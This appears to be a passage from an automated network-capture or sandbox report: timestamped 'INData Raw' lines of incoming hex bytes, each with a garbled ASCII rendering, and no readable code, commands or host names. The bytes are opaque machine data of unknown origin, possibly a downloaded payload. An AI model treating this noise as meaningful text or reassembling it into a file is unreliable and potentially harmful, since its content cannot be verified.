                                                                                                                                                2022-09-29 12:48:59 UTC3038INData Raw: 0b c3 d1 62 bb 9d d8 2e 06 e5 23 ad 84 e7 5d d5 32 75 15 ad 85 ab 3a 25 79 63 ca 53 a8 de 3d 26 93 c0 6e 0e 1e 84 1d 84 ca 00 dc 4e d0 e5 df 8f 4b b9 b2 03 24 09 86 21 09 6f 4f 19 58 1d 27 bb 8d 90 cd 40 c4 8e 91 93 31 60 2f 23 e7 8b 44 0c 1c 1e c4 64 c1 0d 79 28 a8 59 1a 4c c1 31 ca 36 02 70 37 63 9a 6d 1b e5 12 5b 32 76 0e d6 ab 11 b4 4a 6a d0 c2 5b 1f 7e e5 51 91 62 19 19 0b cd 68 07 28 ff ee b1 b8 28 7d e8 a4 24 b8 74 7f c8 69 47 b4 88 61 5d 9e a6 f5 bb 21 6a 7b 06 40 aa a1 fe 22 3e 23 c6 df 84 a6 72 cd b1 12 1b b5 0c 93 84 7f 4e 69 b7 a8 6d 92 76 f9 3e f2 83 25 f7 00 91 bb fb 6f 28 15 94 6e fe b1 7c d3 29 7f 81 a2 df d7 ac dd 51 dd ae a3 3f 6b 83 75 0d a0 41 af 5a f5 68 d0 bf 1e a8 3e 07 53 be 8f 3a 87 ee f4 ac de 94 5c dc 83 94 9b a2 f2 1b f5 6c 48
                                                                                                                                                Data Ascii: b.#]2u:%ycS=&nNK$!oOX'@1`/#Ddy(YL16p7cm[2vJj[~Qbh((}$tiGa]!j{@">#rNimv>%o(n|)Q?kuAZh>S:\lH
                                                                                                                                                2022-09-29 12:48:59 UTC3054INData Raw: 62 4b d6 53 dc 0c 37 68 88 2d 31 33 08 77 49 39 cc b2 c2 6f c2 ea 1e 02 99 14 7c 73 66 fc 65 db 22 35 22 60 1b 20 24 68 6c 1e 10 50 20 1d 84 58 f4 c3 01 4f a7 db 9b c2 ea 52 7a ad cc 85 f2 72 34 e8 28 70 14 06 53 69 d3 a1 64 07 51 7b dc d4 9f 1c 6e 90 c3 3c 05 0d b2 6a 03 c5 70 a5 27 3e 25 ac 01 ea cd 89 c2 2b b0 39 cc cc b1 c2 07 0c 74 c4 05 ae a0 7a da c5 49 05 70 63 98 62 ed 5a fd 4d f9 15 01 a4 b2 67 c4 5d fa 0f 52 ac 1a 9b e2 60 41 65 42 49 71 ef d0 e8 b1 49 4c 6c 80 2b 4e c2 fa 05 b8 99 f9 68 43 b2 67 f0 72 06 a0 5d d0 d2 87 4a 78 a0 d0 5e 8f f5 54 82 37 78 3a 36 0e 29 31 5f 12 e5 54 f3 13 2a 74 0f f0 67 ae d1 c8 39 eb 3b 51 58 cb c8 2c 85 64 df 73 b4 6d a7 dd 10 b4 6c 3b a9 4f 87 38 c8 f2 ce a0 b0 f2 0f 3a 32 41 da 05 33 75 c5 bd cb ed 76 a5 46 e2
                                                                                                                                                Data Ascii: bKS7h-13wI9o|sfe"5"` $hlP XORzr4(pSidQ{n<jp'>%+9tzIpcbZMg]R`AeBIqILl+NhCgr]Jx^T7x:6)1_T*tg9;QX,dsml;O8:2A3uvF
                                                                                                                                                2022-09-29 12:48:59 UTC3070INData Raw: 25 68 3e 37 46 ae 5a 1a bc 5e 7a 36 87 06 08 15 7e 3e e1 fb c9 6c bc e6 34 09 04 ba 23 e2 e4 ff f7 95 5a cc 68 de 4a b2 d6 c6 7d e8 19 0e f5 4d 6f 77 d8 d0 c6 5c ef c0 db 3a 0a c0 b8 85 ab 22 58 f0 fc 8a 6c 12 ba 8c 44 93 a3 e2 fc 82 93 81 b6 53 fe 64 68 f3 33 3c bd 15 45 75 05 21 3c 2b 8e fd b6 bd 72 4c 73 d1 48 d3 1d 3a d2 4c 89 2a 8c fb ce 8d de 86 74 fb 8e b8 ad 3b 6b 3a 25 0e 82 f9 0f 32 85 b2 0a f9 46 bf 33 5d ca 98 5a a7 82 05 62 4d 7f 3f 21 8a d4 fd 9d 84 cc 1c b6 e8 b9 1e f2 33 cc c2 f1 73 b0 73 b2 a5 f8 07 53 69 4b 08 73 23 0f 35 aa 87 2b 8f a3 17 62 a1 4a 9a 5c eb 70 d2 83 4c 8d 10 66 a1 20 23 38 74 b1 c9 38 68 7e 03 15 77 3d 91 09 80 5a a5 9b 72 82 b5 43 9b 18 00 86 c1 71 f6 c1 1d 3e 31 00 e0 1e 0d cf a4 c9 96 b9 8a f4 3a ff fa 15 2a 5f 92 03
                                                                                                                                                Data Ascii: %h>7FZ^z6~>l4#ZhJ}Mow\:"XlDSdh3<Eu!<+rLsH:L*t;k:%2F3]ZbM?!3ssSiKs#5+bJ\pLf #8t8h~w=ZrCq>1:*_
                                                                                                                                                2022-09-29 12:48:59 UTC3086INData Raw: 62 27 fe 1f 25 31 4a 85 36 03 08 cd c9 32 f1 5a 6b 5b 71 85 8f d4 16 78 8f 53 ac 1d 10 a6 ff 11 94 29 b4 7b 6b b2 dd 89 0d fc a8 3e 5e 77 12 bb b9 0e 7a 26 de fe 72 ea 56 51 c5 d4 94 03 04 40 c9 6b 81 2a 3c 4f 3b 34 0c db d0 72 55 64 3c 1a 95 a3 32 72 42 22 44 e0 2b 41 f0 7b 94 73 72 b5 0f a3 4b 61 55 a6 06 4e 4b 32 40 f5 98 23 34 a7 b1 7c 0f d8 b4 ee 71 39 f9 da ac 8a ce 82 e2 d6 f7 9f 56 cf 3d fe ba 46 ca be e4 c4 a3 a8 49 38 c7 ac 8d 46 90 c9 c1 13 1a f7 d7 14 3b 76 eb c8 b1 9c 23 26 3f 12 3d 46 53 40 a8 48 4e 7b 30 d7 12 0d 46 c8 25 bc 00 5d 32 e6 e0 7e 0d 13 45 57 da 2d a0 f5 20 77 17 07 5a 17 23 2f 46 60 a5 27 98 e3 5c 86 65 84 8c 76 db ec 01 31 d1 c6 c0 17 d4 9f 9d 59 64 e6 71 48 ca fb 3f d7 23 c5 d0 c9 47 d4 33 b0 56 1d dc 61 92 f9 92 ed 19 eb ac
                                                                                                                                                Data Ascii: b'%1J62Zk[qxS){k>^wz&rVQ@k*<O;4rUd<2rB"D+A{srKaUNK2@#4|q9V=FI8F;v#&?=FS@HN{0F%]2~EW- wZ#/F`'\ev1YdqH?#G3Va
                                                                                                                                                2022-09-29 12:48:59 UTC3102INData Raw: 47 0d c1 9e 71 c2 2a 18 8a 32 0a 0c 3f 80 7c aa e3 39 ba 75 0c ff 5a 93 c7 f7 eb 08 ec 51 fc 7a 55 79 8a 6c 2a 10 d3 08 ea c6 96 d0 19 54 e1 2f 67 5a 3f 24 69 b0 bd 84 d2 63 fd 63 7f 61 2f b2 bd 91 fd 1e 04 a3 8c 4a a5 b2 1d 92 09 91 55 ce 5b f4 f1 bf e5 d3 7f 13 dc e2 8e d1 fd 38 36 c5 34 8a fe 48 87 5a c1 62 d8 fd 2f f8 30 02 91 82 dd bc 15 0d 60 27 a4 99 b7 84 91 8f 4a 4d a8 1a 65 00 13 31 22 b5 cb ce a1 98 db 3f 5c f8 78 c7 a3 7f f6 57 f7 a1 cf 30 64 89 3d f8 bc 67 e3 6d 18 0e 21 00 ca c8 a0 6d eb 4c 7c 12 9e 23 2f a0 04 ca 6d e5 69 f5 8d db 51 cd d9 89 9b a5 c4 fb f0 27 e6 cd c6 02 1c dd 10 4e fd a1 26 13 ef 1a 8e c3 b0 cf be 3e b5 b5 96 b4 46 36 4f af 8b ce 88 12 ab 1f af 24 54 62 a7 51 28 f5 d7 82 33 b7 7d 60 87 ce 97 59 bc ab 9f 39 3f d5 6a da f2
                                                                                                                                                Data Ascii: Gq*2?|9uZQzUyl*T/gZ?$icca/JU[864HZb/0`'JMe1"?\xW0d=gm!mL|#/miQ'N&>F6O$TbQ(3}`Y9?j
                                                                                                                                                2022-09-29 12:48:59 UTC3118INData Raw: 42 d7 fd 59 02 54 e6 57 cf 44 69 7f 64 e8 f8 b0 59 f3 b2 68 73 4c f5 1c f8 1c ad 4f c2 a2 29 2d 74 2e ac 8a 02 6e a3 7a 33 31 12 b2 0c 90 96 70 17 bc 0c 74 31 81 41 cb 31 fb 26 1c 46 df 6b 9e 14 59 e1 c1 08 a0 75 b1 2a c8 1c 5e 17 c8 35 a6 f2 3f de 34 8a 19 c7 37 89 fc 29 95 e6 7c 8e f4 0f 11 5b 60 a7 67 ec e9 50 42 d2 a9 9e 23 9f 2d 88 ad 66 e7 0e e5 ab 43 81 d4 b5 bb 55 67 78 36 87 d9 64 6d d3 4e 03 76 b7 ac 9e 0f 8d a7 c4 f0 dc 85 7a 00 55 f0 fb 3b df d7 78 b8 56 0a cd 55 84 af 97 98 65 73 a9 7f 35 5e 44 b1 bf 37 77 cc ac 3e 29 a3 e7 6a aa 79 c1 8c b6 57 bd 0c b5 1f 8e 76 05 ae dd ba 7f 68 6e 2c 47 13 8a ee ae 99 4d 4f 62 26 9c 1b dd 2b 15 d2 f7 ab 88 a5 0d c0 46 98 ca 2c 1a a8 17 42 02 77 ad dd 38 d5 7c 92 e2 c5 ad 0f ff 95 4d bf 13 43 61 6d fc 84 75
                                                                                                                                                Data Ascii: BYTWDidYhsLO)-t.nz31pt1A1&FkYu*^5?47)|[`gPB#-fCUgx6dmNvzU;xVUes5^D7w>)jyWvhn,GMOb&+F,Bw8|MCamu
                                                                                                                                                2022-09-29 12:48:59 UTC3134INData Raw: 83 77 c2 e7 39 0e 6f 47 cc 98 a4 fd ee 6c 07 56 a4 cd 60 97 dc a0 42 78 26 c3 03 de a0 14 0f 59 ce 3d 59 71 f6 ba d7 b5 db c0 4b 8e bf dc 2b 49 01 b3 bb f3 8b 5a db d0 c7 72 a6 23 2f 32 fc 0a 2c 47 94 e2 96 da 2e 7f 0d 6d 4c ce b3 de 9c 38 aa 72 2e 8e 89 51 7c df f4 13 bf 49 56 71 ac d1 8f 0a de f2 48 89 b9 ff c0 05 cf 79 c3 9f 33 fd 89 29 1a 9a ea 8e f2 99 6a 8b ca 9a 83 74 0a c4 75 48 40 1a e1 c9 c5 a1 10 d6 85 12 d1 54 83 5e bc ca e1 47 b9 b6 a7 39 cb f8 48 65 0e 12 b1 2c f8 3c 02 76 45 87 00 87 65 16 16 f4 16 37 5f 43 ce 83 6b 19 d4 f4 b7 fe 44 f3 00 f2 41 a8 fc bd 0e 15 14 3a 52 09 f5 43 18 70 15 d4 56 0c 4e b3 10 9a e5 d3 87 f2 1d 80 3b 0f f2 d4 48 91 9c fd 1a 25 1f 06 63 89 3d 8a e6 e8 fd 1a 66 91 65 4b 2a bd 8a ec 28 17 8a fd 8f 46 98 30 e6 01 4f
                                                                                                                                                Data Ascii: w9oGlV`Bx&Y=YqK+IZr#/2,G.mL8r.Q|IVqHy3)jtuH@T^G9He,<vEe7_CkDA:RCpVN;H%c=feK*(F0O
                                                                                                                                                2022-09-29 12:48:59 UTC3150INData Raw: 11 a1 97 7b 29 9b 06 6e 86 8e f7 1e 6d 8b d6 cc b9 b9 ab 6f a6 e7 31 47 5b 81 75 99 b0 02 1b 87 6e 24 55 21 c8 e8 24 b9 cd b5 de c6 aa 93 95 b3 95 0e 65 eb 2b a4 f9 1c df d7 bd 15 27 13 ed a2 9d e0 0d 08 b7 d6 02 b5 0b 55 bd 7c a0 d1 02 86 00 43 b2 ca 5b 3d 6c 66 6c a4 ad 2a 0c b3 c3 1c b2 8f ea 50 f1 75 be d4 84 2e dc f0 ee 4c 3d ea b3 ba f0 9f f4 33 44 51 5b 20 76 2c b8 45 13 00 44 9b bd 62 77 ec fc 36 82 8d ce fd b8 7a 28 2b 8b 84 cc 1f a3 cb bb 8e ff 39 f2 0b 5e 4d 6a 50 ca 07 69 b2 48 4a 0a d0 ec 54 13 a3 d5 8b 79 69 22 20 db 77 43 7b de 89 d1 00 d0 c4 f6 c9 4d e3 ec c1 19 58 dd 38 ff 35 87 b8 0a ab d5 5b 5e f3 4d f8 03 14 b9 bb 52 3b 71 ad f2 cd 09 ec 31 fc f7 93 76 78 86 71 c4 45 c5 63 fe e8 f0 ab 66 18 44 5d c9 9c 32 23 3a dd b9 1c 1f 45 ba c6 a1
                                                                                                                                                Data Ascii: {)nmo1G[un$U!$e+'U|C[=lfl*Pu.L=3DQ[ v,EDbw6z(+9^MjPiHJTyi" wC{MX85[^MR;q1vxqEcfD]2#:E
                                                                                                                                                2022-09-29 12:48:59 UTC3166INData Raw: 8b fc 10 08 8b 34 17 14 3f a1 06 28 6c e3 f1 57 a5 2f 7f f2 9f 8b f8 2a d7 83 4c ae 21 cc 6e db 98 24 6d 1c b0 e0 c0 94 5c c1 7b 65 34 8b cb cc 01 cc 30 2c c7 57 52 a3 23 27 53 12 da 4d 9f 48 6d b0 9e 17 86 44 cc 4e 4f 44 0b 09 b4 a3 40 a7 60 1c f9 35 67 8e 64 5f e8 1c cb 99 a8 97 09 a7 f9 6a e7 bd a3 4e 31 ae 4a b9 7b ef c5 aa 2c dd 21 7f 7e 08 8e fa a9 d8 d4 d7 c3 51 7b 2e c6 b7 3c 5d 1a 3f 64 25 6a 44 34 80 2f 93 52 8d fa 81 b6 34 d4 fc b1 a5 5c d4 46 d2 12 63 13 9c aa 08 ba ec 1a a8 ef 8b 6e 41 e0 f3 b7 fa 30 96 26 28 19 70 5d de cc cf 68 2d 33 38 0a 2b c4 99 45 cb 04 ba ad 34 0f 31 0f b7 7d 96 77 70 6c b9 8a 6d ce f1 48 06 58 1c 32 76 fc c9 08 03 6a c0 3e 70 e0 51 83 82 e1 0e 83 99 23 bc 46 a8 1f 61 56 63 9e da 33 98 f9 84 30 8a f5 3b cb 00 c4 cb c5
                                                                                                                                                Data Ascii: 4?(lW/*L!n$m\{e40,WR#'SMHmDNOD@`5gd_jN1J{,!~Q{.<]?d%jD4/R4\FcnA0&(p]h-38+E41}wplmHX2vj>pQ#FaVc30;
                                                                                                                                                2022-09-29 12:48:59 UTC3182INData Raw: 0f ef b6 72 c7 0d af 3b 04 9f 2e 15 59 2c 31 50 ac bc e7 a5 d0 08 84 e5 c6 21 14 ef 85 fe f9 53 46 43 6a 1c 56 af a3 d5 7b de 3b b2 3c e4 b0 5b 9a eb 9c 62 79 25 0b e8 45 a5 89 b2 31 04 59 4f b9 c8 e0 3c 73 61 d4 d8 0a 30 fe e5 27 3b fe b1 1b 3a 22 55 05 d9 dd 21 4f 43 97 db 86 29 e2 34 8f b1 47 ef 33 ea 23 8a bd 44 3a a3 0e 0e 35 93 6c 84 c9 b0 71 d2 a0 bf 97 e0 92 7f 74 a2 ca b9 e2 b8 df ab ef 4c aa d5 80 67 75 ae 97 f9 7f 1d d6 e8 fb 1a a5 51 b8 85 8e 35 5d 0b 90 05 70 0b ab 7a 67 f3 72 02 ec ef 67 11 1a 0b 1b df 61 55 9d 87 75 95 79 4c 18 2f f9 10 53 0e ff 7e d3 1a 81 de e4 d5 4e 36 20 a2 e4 ba 09 f6 8c ca ff af e7 c9 74 1e bb 37 7e 7a 17 c9 7c 87 62 f2 90 02 37 92 17 44 e9 62 b4 87 f2 06 e8 a6 94 bf 78 c2 68 f3 10 a5 7d 56 0c 41 4f 85 8c 1e 51 f6 cd
                                                                                                                                                Data Ascii: r;.Y,1P!SFCjV{;<[by%E1YO<sa0';:"U!OC)4G3#D:5lqtLguQ5]pzgrgaUuyL/S~N6 t7~z|b7Dbxh}VAOQ
                                                                                                                                                2022-09-29 12:48:59 UTC3198INData Raw: b6 ec 7c e6 16 92 4a df 67 3b 61 13 6a 53 e5 32 36 6d f8 13 3e da 47 ae 67 de c3 03 08 85 bd be 88 28 5b d8 72 c1 5d c6 40 01 af e4 d5 d2 b8 17 58 c0 98 00 5b 48 44 b2 33 41 39 38 ac 31 4d a6 51 6b 5e fe 09 db ed d1 4b d2 63 63 68 0e 26 09 f9 f2 60 8d 65 ee 03 5f 71 f5 67 6b a9 9c a0 d0 80 91 00 bd c0 a3 ce 88 2d 55 49 9e e7 fe 42 97 e5 55 32 82 22 b7 74 ec 61 d3 89 11 7d b9 24 ae 80 08 98 54 4b 44 55 d0 e8 97 57 51 e8 41 0b cb c1 02 20 2b 06 3c c0 dc 5a c8 21 4a 5d 6c c0 6d 1e 1e 82 b3 97 b3 4f 23 c5 dc e7 4e f2 7b 97 71 82 66 75 6a 0e 0c db 24 cf 2a 18 e5 8d e7 96 8d 5c dd e9 af 2b c9 aa cf b1 89 bf 9f 0a b7 1d 5c 37 a5 19 07 ad b3 7e 27 60 dd 00 d1 56 21 54 43 fc 61 37 15 3a 10 9b 12 82 f5 bc 0a 46 e4 85 0d 33 9c 6f 01 b0 6f 12 dd f8 b5 97 1b c7 f3 4e
                                                                                                                                                Data Ascii: |Jg;ajS26m>Gg([r]@X[HD3A981MQk^Kcch&`e_qgk-UIBU2"ta}$TKDUWQA +<Z!J]lmO#N{qfuj$*\+\7~'`V!TCa7:F3ooN
                                                                                                                                                2022-09-29 12:48:59 UTC3214INData Raw: c7 2c 7d 78 61 88 f6 34 ea 65 e6 73 17 df 86 30 be 9a 1f 33 79 31 a0 13 31 15 6c 3b e6 c4 5b 2d e7 bf a5 bb d8 15 3d 97 74 79 2b 73 06 0e 1d e1 7a ad f9 21 d2 ab 6b 7d 40 5d b7 2c 79 77 49 e8 86 4d 47 ac af 6d 82 6e fa d3 2a 43 72 40 8c e2 ec 3a 81 95 a9 ef e7 73 65 40 8a ba f1 f0 ef 6c 30 e2 2f 6a 9d 9b 08 7a 20 cb 39 da eb af 9f a0 11 96 2c aa 28 65 de 12 c6 9a 52 80 fb e4 f1 f2 21 c3 52 a7 10 59 b1 6e cf 40 56 f0 a3 91 83 95 4d e1 d9 5f 9b bc b8 9e 5f 51 1f 61 09 98 3c a0 0b ef 3f 36 9f ab b2 84 2e db 5c 34 bf de c3 7c 59 6a 60 84 a3 31 03 09 e1 38 dc 25 07 ef b1 1e df de 47 84 61 e1 ad d2 d7 3c 8c f3 93 4e 13 72 a5 4a 47 27 51 fd f4 0f 06 b1 af c9 9d 58 a5 95 d8 df b6 87 10 92 65 01 10 f6 ed 1a 03 a2 d3 13 55 80 b7 61 f4 08 4f ed bc 97 4a 2f 66 e0 d3
                                                                                                                                                Data Ascii: ,}xa4es03y11l;[-=ty+sz!k}@],ywIMGmn*Cr@:se@l0/jz 9,(eR!RYn@VM__Qa<?6.\4|Yj`18%Ga<NrJG'QXeUaOJ/f
                                                                                                                                                2022-09-29 12:48:59 UTC3230INData Raw: 84 95 c7 f5 07 1c 1c 94 03 38 cd a6 06 5d 04 ce d2 c9 21 0c d3 bf 11 9f b0 5b bd d5 61 24 f5 19 b3 36 ab 2f 9d 50 8e b9 8d 77 42 b3 c6 84 20 a3 11 2e 85 6d 55 6c 5f e6 9d 1c 62 73 e3 07 74 9d a9 16 f5 3a dc 94 69 16 49 03 86 ca 43 eb fc e7 df f3 e1 bb 49 47 96 05 40 18 eb 26 9d 9b 52 83 19 06 e1 d1 8c 29 18 86 24 05 03 a0 f5 0a fb da 87 90 39 53 92 de 15 74 76 ba 3c 5d 57 a7 56 69 92 16 ec 56 d3 14 ad fc 10 10 60 65 d0 36 70 95 c6 e1 ba c6 ec 2e 2f 4a 18 45 ff 43 91 03 0a 2f 06 85 e1 ca 3f 81 4a f1 0c a8 83 bd 85 e3 af f8 23 29 6c ec f1 84 d2 5c 8f 5c 1c ad 6e 8e a5 c4 53 b6 7f 10 41 bc 29 cd 15 11 f5 7a 3c e8 ca 1d 0c 23 57 c9 98 5c 76 94 b0 92 72 2f 99 23 01 25 c6 93 d1 34 a5 a4 a6 a5 20 8a 5c ba 2c da d3 f6 75 e2 c4 76 c2 2e 23 aa bd 2a 34 f5 82 00 7d
                                                                                                                                                Data Ascii: 8]![a$6/PwB .mUl_bst:iICIG@&R)$9Stv<]WViV`e6p./JEC/?J#)l\\nSA)z<#W\vr/#%4 \,uv.#*4}
                                                                                                                                                2022-09-29 12:48:59 UTC3246INData Raw: 5c 12 c2 d9 c9 fb e2 95 f9 c1 3f ab f4 af 41 77 1a c1 6c fd 0d 36 f4 02 9a dd 58 63 19 82 74 ab 1c 2a f6 bf 74 96 a8 be c5 0a 9f df ae d7 8c 00 e6 70 d5 b2 11 70 d9 c7 b8 ce 9d 2e 50 2c 40 f1 f1 58 6a ba f3 c0 2d 95 26 3d b2 e7 cb f0 27 3a e7 02 b8 b2 2f 9a 24 66 7b 51 99 25 fa 8b b6 a5 e7 12 2e 77 9f 98 47 6b e2 b2 87 f9 9d a1 62 d1 3f af c7 5f 71 b0 27 6a 74 d3 3d a4 fe 16 05 12 e7 5e 43 40 3c b1 8d 22 21 53 d3 9d 5e 04 ae 95 b6 9e b2 9d 70 0e a2 1a c8 d7 36 70 43 5d fc 9e 7b 90 00 f1 d0 cc 4f 21 94 b4 4c d7 eb 7a 4b e0 7a 10 29 74 5d dd 90 95 e9 83 f3 69 e7 46 f8 3a b8 fa ac f4 15 aa 8b bd fb fb 8c 69 40 24 47 79 e0 df d0 f2 e5 d3 11 a9 a0 b5 57 ea 0c 16 dd 9f d9 73 4b 20 c2 8b f9 ab 4f 1e ad a1 bb 9f 14 83 20 d3 57 54 60 5d 1d 28 d7 51 bd 8f 62 6f 4e
                                                                                                                                                Data Ascii: \?Awl6Xct*tpp.P,@Xj-&=':/$f{Q%.wGkb?_q'jt=^C@<"!S^p6pC]{O!LzKz)t]iF:i@$GyWsK O WT`](QboN
                                                                                                                                                2022-09-29 12:48:59 UTC3262INData Raw: 6b 41 ff 57 06 b5 f2 7d dc ad f6 97 96 0b 85 22 39 e8 85 be 67 10 d7 b4 76 2a 6f 43 63 61 41 9e f7 1d 53 d1 9c d1 11 a7 20 d3 b5 e0 3a 42 24 c8 47 f3 b4 36 fb ca 7c c4 4e 56 ad 32 26 5b f4 62 9d 0f c4 7b 8d 27 20 97 b5 a8 95 f9 88 c7 64 83 42 8b 32 a4 68 ff c5 0f f3 77 b5 b2 55 d1 00 21 16 2b 10 c7 1e 1c 71 c2 86 6c 2e 1a c6 16 e8 c2 5d a3 5f 18 61 51 f0 3a dc 59 e3 3f 8b c4 19 32 2a e8 51 d8 a5 a9 34 d9 ff b1 c7 15 4a 47 4e 5c 3b fa 7a 14 3b 2d c5 cc 6d 21 c8 fd 0f be 4c 99 55 b1 d1 f2 09 c4 6d bc 00 ab 47 2f a7 2f 72 a5 43 ce c6 ca 49 ab ad 41 71 7e 66 6b ab 7d e8 31 4b fc 74 18 86 3b b8 da 9d dc d2 fa 90 02 65 71 19 90 16 89 63 cb c7 87 33 c2 c0 f2 d3 28 6a e9 65 c2 82 b9 71 d2 06 23 aa e1 e0 da a1 63 e5 83 06 6c fc 14 ff e0 e1 d2 f4 09 3b a9 c5 7b 61
                                                                                                                                                Data Ascii: kAW}"9gv*oCcaAS :B$G6|NV2&[b{' dB2hwU!+ql.]_aQ:Y?2*Q4JGN\;z;-m!LUmG//rCIAq~fk}1Kt;eqc3(jeq#cl;{a
                                                                                                                                                2022-09-29 12:48:59 UTC3278INData Raw: 1b 47 6d f3 88 4f 6f ce 8a 94 a6 34 55 83 3a b7 5c 4c 31 7d 92 e2 e7 27 d6 43 0c c8 3d 47 68 f8 5e 60 0d 7f b1 cc e4 76 e3 56 8c 2a e4 f6 89 5b 62 ba 90 92 8c 40 ed 68 af 7f a0 d7 4d 16 14 76 08 66 83 9e dc 65 ce 03 90 a4 2e af 87 7d b9 2c ba e8 14 ab 84 40 46 cd 7b 26 d0 86 df b8 40 70 b8 d7 de 1c e1 04 bd 42 e7 b1 c3 77 69 68 b3 80 63 18 84 00 12 3d e8 69 48 ba 33 76 db 40 4f 65 df 7c a1 04 dc 20 03 b1 ab 73 28 9b cc 2a b1 df 3e 99 f6 3a 6b 6c 22 41 2a 9b cd e5 d0 19 ce 45 43 88 44 96 fa 21 59 ab 77 02 29 88 21 63 9e 16 d2 ab 5c 5e f7 b1 30 c3 8d 80 fa c7 fe 14 fc f7 16 12 cd 22 c8 f7 72 61 60 28 55 5a 3f bc c2 0b 55 b5 c4 5e f5 99 94 39 80 4f 38 8f 1f ae 80 09 4f 61 62 dc b5 bc 35 cd 5a 93 94 b4 20 d7 85 0d 7e f3 07 bd c1 a7 0a 0e a9 5c 31 03 4c 1d 2e
                                                                                                                                                Data Ascii: GmOo4U:\L1}'C=Gh^`vV*[b@hMvfe.},@F{&@pBwihc=iH3v@Oe| s(*>:kl"A*ECD!Yw)!c\^0"ra`(UZ?U^9O8Oab5Z ~\1L.
                                                                                                                                                2022-09-29 12:48:59 UTC3294INData Raw: b5 e2 7a d5 b1 29 19 1b 1b d0 61 00 64 45 e7 5f c6 20 44 c0 af 7c 11 c4 47 ef 3f 70 1d c2 6a 98 7b c0 12 c9 b3 34 4b 70 b8 bd 83 4c 22 c0 a8 90 f6 3d 68 7b 89 20 3b c1 05 f9 f6 e9 83 67 46 78 38 60 dc de 4a 55 77 93 3e ae 0f 1a b7 c4 a4 65 7b ab 5a 06 c4 ff cb 01 b7 4c 1d 74 11 67 c1 60 cb 5c 63 40 47 e1 5e a5 ca 9e 53 0d c3 11 7c 5c d9 a5 9b 73 8f 48 49 55 81 9f e5 ab 56 e7 4f 31 73 fe f8 ba 18 ee 3b 63 60 75 bb d5 df 2f 34 e7 84 1d 05 98 5d da 53 b4 0c 4e ca c1 e5 e3 45 47 70 91 c6 00 15 4b 9b 5b fa 3d 45 d3 b7 ee cb be 1c bb ba 82 57 a2 3e 08 82 fe 85 ea a0 2e d7 0f 07 b8 52 f6 1e db e9 99 67 84 fc f0 32 59 1e 6b 1b f8 93 05 b9 25 86 2f 28 9f 31 75 75 bc 44 57 6b ce 16 c7 88 6f b0 dc 18 92 22 4f 16 03 f2 7a 32 71 25 e0 a2 5e 97 25 5b f6 3d 0f 03 a6 e6
                                                                                                                                                Data Ascii: z)adE_ D|G?pj{4KpL"=h{ ;gFx8`JUw>e{ZLtg`\c@G^S|\sHIUVO1s;c`u/4]SNEGpK[=EW>.Rg2Yk%/(1uuDWko"Oz2q%^%[=
                                                                                                                                                2022-09-29 12:48:59 UTC3310INData Raw: 65 3c c2 43 e2 42 76 08 9b e3 af 6d 5d 91 96 c2 68 a3 39 9f fc ab 94 b3 1c 66 4c 59 6d 6c 6f 54 1e 58 ff 9f e3 e4 f0 cb 4d 73 42 14 11 3d b0 7f f4 7a ef bb 91 bd 35 e9 d3 59 8e 82 60 ae a2 43 87 9c 64 a7 44 10 ad ca d8 fb 11 ba ae 3e 01 e6 74 b2 6f 5d 47 f4 80 ad 77 f6 99 ca a8 3f 35 7b 6e 6d 1b b5 7c e1 ab ce fd 4a 72 88 83 f4 29 f4 26 ab b9 cf 48 aa e6 23 ed bf d0 7e e3 4a 5d 95 54 d7 bc 04 f0 f7 d0 88 ab 56 bb 60 b6 41 e5 d8 43 bc 2d 03 02 ca a2 0e 09 ac dd cd 85 5e 08 55 26 4c ae 2f 82 2d 50 70 6f fd db 78 0a 82 97 91 df 1d 76 3b a2 5c c4 60 0c 7f 71 08 73 d1 52 00 85 8f b7 b9 88 d0 e1 bf 41 c7 a0 31 58 d5 2b a2 f9 33 de 38 0c b3 70 58 0c 3f a8 5b 66 f8 88 be 73 dc 61 9a c5 c5 3a 00 89 8f 78 fc f5 00 7d 53 56 6a 71 75 05 03 de 14 b9 14 67 d4 ab 0b a6
                                                                                                                                                Data Ascii: e<CBvm]h9fLYmloTXMsB=z5Y`CdD>to]Gw?5{nm|Jr)&H#~J]TV`AC-^U&L/-Ppoxv;\`qsRA1X+38pX?[fsa:x}SVjqug
                                                                                                                                                2022-09-29 12:48:59 UTC3326INData Raw: e6 cc d2 fa 06 eb bc ed 8c b4 7d c9 03 ba 62 c6 60 ca 83 78 aa 1f bb 0c b8 a4 10 98 4d aa 30 56 d7 6c 65 1a 22 57 7d f3 5e 5e 5e 11 57 ba cb 5e ee ba 1d 6c 26 d2 b8 7d 7f 06 6b d7 91 78 ed 90 1c d8 45 61 d6 53 2b 37 67 d9 1c eb 8e 64 5a 85 78 1c 30 24 ff 51 d1 b1 e1 c7 04 d9 4b e8 70 0f ff a2 77 46 e3 18 96 e9 d1 44 c1 bc ba af 6b db 11 cc 30 f1 35 2f 68 58 e0 0b c6 33 d3 2c 59 94 1e 3c 71 91 0e 2d 20 13 df ca 58 83 d1 9d 83 b1 cd a6 c1 86 06 ff 55 1f 79 7a cb 70 c0 1e 7e 74 b0 7e 9a bf 6e 76 fb b1 52 95 6b 6a ba 9e 7f 91 7e e8 10 8e b8 c3 2c b8 6b 68 b1 db 70 9e 56 86 dd d9 5d 4e 21 18 fa c5 65 25 fe 59 4e 34 5b d3 a9 21 fe 2f 79 6d 06 d4 7b d3 60 14 1e 72 87 ec 72 29 00 04 71 a1 ae a0 8a 7f ff 40 ea 46 eb f4 eb 67 46 48 21 d6 43 c3 0d 77 ad de 0c 33 03
                                                                                                                                                Data Ascii: }b`xM0Vle"W}^^^W^l&}kxEaS+7gdZx0$QKpwFDk05/hX3,Y<q- XUyzp~t~nvRkj~,khpV]N!e%YN4[!/ym{`rr)q@FgFH!Cw3
